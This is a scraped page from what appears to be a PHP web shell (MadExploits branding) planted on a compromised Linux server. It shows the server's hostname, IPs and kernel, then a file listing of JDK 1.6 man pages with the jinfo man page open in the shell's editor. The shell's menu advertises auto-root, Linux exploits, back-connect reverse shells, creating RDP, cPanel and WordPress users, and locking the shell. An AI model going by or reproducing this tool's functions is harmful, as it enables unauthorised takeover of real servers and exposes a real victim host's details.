Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
java /
jdk1.6.0_45 /
man /
man1 /
[ HOME SHELL ]
Name
Size
Permission
Action
appletviewer.1
1.77
KB
-rw-r--r--
apt.1
3.71
KB
-rw-r--r--
extcheck.1
2.11
KB
-rw-r--r--
idlj.1
17.85
KB
-rw-r--r--
jar.1
18.73
KB
-rw-r--r--
jarsigner.1
48.97
KB
-rw-r--r--
java.1
19.89
KB
-rw-r--r--
javac.1
29.73
KB
-rw-r--r--
javadoc.1
184.09
KB
-rw-r--r--
javah.1
5.15
KB
-rw-r--r--
javap.1
5.63
KB
-rw-r--r--
javaws.1
4.21
KB
-rw-r--r--
jconsole.1
2.92
KB
-rw-r--r--
jdb.1
10.65
KB
-rw-r--r--
jhat.1
3.59
KB
-rw-r--r--
jinfo.1
2.36
KB
-rw-r--r--
jmap.1
3.46
KB
-rw-r--r--
jps.1
7.54
KB
-rw-r--r--
jrunscript.1
3.73
KB
-rw-r--r--
jsadebugd.1
2.21
KB
-rw-r--r--
jstack.1
2.81
KB
-rw-r--r--
jstat.1
84.97
KB
-rw-r--r--
jstatd.1
7.35
KB
-rw-r--r--
jvisualvm.1
2.67
KB
-rw-r--r--
keytool.1
69.35
KB
-rw-r--r--
native2ascii.1
1.78
KB
-rw-r--r--
orbd.1
11.31
KB
-rw-r--r--
pack200.1
10.01
KB
-rw-r--r--
policytool.1
1.5
KB
-rw-r--r--
rmic.1
9.6
KB
-rw-r--r--
rmid.1
13.76
KB
-rw-r--r--
rmiregistry.1
2.19
KB
-rw-r--r--
schemagen.1
2.39
KB
-rw-r--r--
serialver.1
1.95
KB
-rw-r--r--
servertool.1
5.79
KB
-rw-r--r--
tnameserv.1
12.54
KB
-rw-r--r--
unpack200.1
2.85
KB
-rw-r--r--
wsgen.1
10.65
KB
-rw-r--r--
wsimport.1
11.28
KB
-rw-r--r--
xjc.1
10.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jinfo.1
." Copyright (c) 2004, 2010, Oracle and/or its affiliates. All rights reserved. ." .TH jinfo 1 "06 Apr 2010" ." Generated from HTML by html2man (author: Eric Armstrong) .LP .SH "Name" jinfo \- Configuration Info .LP .SH "SYNOPSIS" .LP .LP .nf \f3 .fl \fP\f3jinfo\fP [ option ] pid .fl \f3jinfo\fP [ option ] executable core .fl \f3jinfo\fP [ option ] [server\-id@]remote\-hostname\-or\-IP .fl .fi .LP .SH "PARAMETERS" .LP .LP .RS 3 .TP 3 option Options are mutually exclusive. Option, if used, should follow immediately after the command name. .RS 3 .TP 3 pid process id for which the configuration info is to be printed. The process must be a Java process. To get a list of Java processes running on a machine, jps(1) may be used. .RE .RS 3 .TP 3 executable Java executable from which the core dump was produced. .RE .RS 3 .TP 3 core core file for which the configuration info is to be printed. .RE .RS 3 .TP 3 remote\-hostname\-or\-IP remote debug server's (see jsadebugd(1)) hostname or IP address. .RE .RS 3 .TP 3 server\-id optional unique id, if multiple debug servers are running on the same remote host. .RE .RE .LP .SH "DESCRIPTION" .LP .LP .LP \f3jinfo\fP prints Java configuration information for a given Java process or core file or a remote debug server. Configuration information includes Java System properties and Java virtual machine command line flags. If the given process is running on a 64\-bit VM, you may need to specify the \f2\-J\-d64\fP option, e.g.: .br .LP .RS 3 .LP jinfo \-J\-d64 \-sysprops pid .RE .LP \f3NOTE \- This utility is unsupported and may or may not be available in future versions of the JDK. On Windows, jinfo only supports the \-flag option of a running process.\fP .LP .SH "OPTIONS" .LP .LP .RS 3 .TP 3 <no option> prints both command line flags as well as System properties name, value pairs. .br .TP 3 \-flag name prints the name and value of the given command line flag. .br .TP 3 \-flag [+|\-]name enables or disables the given boolean command line flag. .br .TP 3 \-flag name=value sets the given command line flag to the specified value. .br .TP 3 \-flags prints command line flags passed to the JVM. pairs. .br .TP 3 \-sysprops prints Java System properties as name, value pairs. .br .TP 3 \-h prints a help message .TP 3 \-help prints a help message .RE .LP .SH "SEE ALSO" .LP .RS 3 .TP 2 o jps(1) .TP 2 o jsadebugd(1) .RE .LP
Close